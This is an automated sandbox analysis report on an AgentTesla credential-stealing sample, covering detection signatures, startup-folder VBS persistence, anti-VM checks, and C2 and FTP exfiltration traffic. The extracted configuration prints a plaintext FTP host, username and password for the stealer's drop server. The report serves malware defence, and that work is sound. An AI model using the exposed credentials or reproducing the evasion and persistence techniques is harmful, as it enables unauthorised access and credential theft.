Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
toIuQILmr1.exe

Overview

General Information

Sample name:toIuQILmr1.exe
renamed because original name is a hash value
Original sample name:0502e71249410dba419218374909428d7d53cca90c3cfe8861b7f8eae432a4b9.exe
Analysis ID:1588811
MD5:9b46500828b338eb4cda1d49bed1f791
SHA1:fe2f2d5e222765e585a61f80c33b061f643e7107
SHA256:0502e71249410dba419218374909428d7d53cca90c3cfe8861b7f8eae432a4b9
Tags:AgentTeslaexeuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • toIuQILmr1.exe (PID: 360 cmdline: "C:\Users\user\Desktop\toIuQILmr1.exe" MD5: 9B46500828B338EB4CDA1D49BED1F791)
    • outvaunts.exe (PID: 5752 cmdline: "C:\Users\user\Desktop\toIuQILmr1.exe" MD5: 9B46500828B338EB4CDA1D49BED1F791)
      • RegSvcs.exe (PID: 5376 cmdline: "C:\Users\user\Desktop\toIuQILmr1.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 3648 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • outvaunts.exe (PID: 6156 cmdline: "C:\Users\user\AppData\Local\kinematical\outvaunts.exe" MD5: 9B46500828B338EB4CDA1D49BED1F791)
      • RegSvcs.exe (PID: 6512 cmdline: "C:\Users\user\AppData\Local\kinematical\outvaunts.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2187480515.00000000027EE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              Click to see the 22 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              2.2.outvaunts.exe.1b30000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                2.2.outvaunts.exe.1b30000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  2.2.outvaunts.exe.1b30000.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x32935:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x329a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x32a31:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x32ac3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x32b2d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x32b9f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x32c35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x32cc5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  2.2.outvaunts.exe.1b30000.1.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x2fb6b:$s2: GetPrivateProfileString
                  • 0x2f218:$s3: get_OSFullName
                  • 0x30906:$s5: remove_Key
                  • 0x30ab3:$s5: remove_Key
                  • 0x31995:$s6: FtpWebRequest
                  • 0x32917:$s7: logins
                  • 0x32e89:$s7: logins
                  • 0x35b8e:$s7: logins
                  • 0x35c4c:$s7: logins
                  • 0x375a1:$s7: logins
                  • 0x367e6:$s9: 1.85 (Hash, version 2, native byte-order)
                  5.2.outvaunts.exe.3e90000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 18 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , ProcessId: 3648, ProcessName: wscript.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs" , ProcessId: 3648, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\kinematical\outvaunts.exe, ProcessId: 5752, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T05:51:02.044557+010020299271A Network Trojan was detected192.168.2.549707162.241.62.6321TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T05:51:02.441601+010028555421A Network Trojan was detected192.168.2.549713162.241.62.6333214TCP
                    2025-01-11T05:51:02.446904+010028555421A Network Trojan was detected192.168.2.549713162.241.62.6333214TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 2.2.outvaunts.exe.1b30000.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeReversingLabs: Detection: 71%
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeVirustotal: Detection: 76%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: toIuQILmr1.exeVirustotal: Detection: 76%Perma Link
                    Source: toIuQILmr1.exeReversingLabs: Detection: 71%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: toIuQILmr1.exeJoe Sandbox ML: detected
                    Source: toIuQILmr1.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: Binary string: wntdll.pdbUGP source: outvaunts.exe, 00000002.00000003.2063899010.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000002.00000003.2065002937.0000000003810000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000003.2182637318.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000003.2182943669.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: outvaunts.exe, 00000002.00000003.2063899010.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000002.00000003.2065002937.0000000003810000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000003.2182637318.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000003.2182943669.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E34696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E34696
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E3C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E3C9C7
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E3C93C FindFirstFileW,FindClose,0_2_00E3C93C
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E3F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E3F200
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E3F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E3F35D
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E3F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E3F65E
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E33A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E33A2B
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E33D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E33D4E
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E3BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E3BF27
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CB4696 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00CB4696
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CBC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00CBC9C7
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CBC93C FindFirstFileW,FindClose,2_2_00CBC93C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CBF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00CBF200
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CBF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00CBF35D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CBF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00CBF65E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CB3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00CB3A2B
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CB3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00CB3D4E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CBBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00CBBF27
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CB4696 GetFileAttributesW,FindFirstFileW,FindClose,5_2_00CB4696
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CBC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00CBC9C7
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CBC93C FindFirstFileW,FindClose,5_2_00CBC93C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CBF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00CBF200
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CBF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00CBF35D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CBF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00CBF65E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CB3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00CB3A2B
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CB3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00CB3D4E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CBBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00CBBF27

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49713 -> 162.241.62.63:33214
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49707 -> 162.241.62.63:21
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.outvaunts.exe.1b30000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.outvaunts.exe.3e90000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: global trafficTCP traffic: 192.168.2.5:49713 -> 162.241.62.63:33214
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 162.241.62.63 162.241.62.63
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownFTP traffic detected: 162.241.62.63:21 -> 192.168.2.5:49707 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 22:51. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 22:51. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 22:51. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E425E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00E425E2
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: ftp.antoniomayol.com
                    Source: RegSvcs.exe, 00000003.00000002.2187480515.00000000027EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://antoniomayol.com
                    Source: RegSvcs.exe, 00000003.00000002.2187480515.00000000027EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.antoniomayol.com
                    Source: RegSvcs.exe, 00000003.00000002.2187480515.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: outvaunts.exe, 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2187480515.0000000002791000.00000004.00000800.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: RegSvcs.exe, 00000006.00000002.4510792192.0000000000FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting&
                    Source: RegSvcs.exe, 00000003.00000002.2187480515.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: outvaunts.exe, 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, outvaunts.exe, 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E4425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E4425A
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E44458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00E44458
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CC4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00CC4458
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CC4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00CC4458
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E4425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E4425A
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E30219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00E30219
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E5CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E5CDAC
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CDCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00CDCDAC
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CDCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_00CDCDAC

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 2.2.outvaunts.exe.1b30000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.outvaunts.exe.1b30000.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 5.2.outvaunts.exe.3e90000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
